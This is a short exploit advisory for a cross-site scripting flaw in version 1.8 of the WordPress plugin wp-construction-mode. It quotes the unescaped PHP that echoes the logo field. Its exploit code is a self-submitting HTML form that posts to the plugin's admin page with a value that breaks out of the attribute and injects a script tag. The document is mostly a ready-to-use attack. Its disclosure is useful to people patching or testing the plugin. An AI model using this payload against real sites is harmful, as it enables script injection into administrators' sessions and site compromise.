###################### # Exploit Title : Wordpress wp-construction-mode.1.8 Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://wordpress.org/plugins/wp-construction-mode # Software Link : http://downloads.wordpress.org/plugin/wp-construction-mode.1.8.zip # Date : 2014-06-27 # Tested on : Windows 7 / Mozilla Firefox ###################### # Location : http://localhost/wp-admin/admin.php?page=under-construction.php ###################### # Vulnerable code : <td><?php _e('Logo') ?></td> <td> <input type="text" name="wuc_logo" value="<?php echo $wuc_logo ?>" placeholder="<?php _e('Enter image path/url or leave blank for no logo'); ?>"/> </td> </tr> ###################### Exploit Code: <html> <body> <form name="post_form" method="post" action="http://localhost/wp-admin/admin.php?page=under-construction.php" enctype="multipart/form-data"> <input type="hidden" name="wuc_logo" value='"/><script>alert(1);</script>'/> <script language="Javascript"> setTimeout('post_form.submit()', 1); </script> <input type="hidden" name="act" value="save" /> </form> </body> </html> ##################### Discovered By : ACC3SS #####################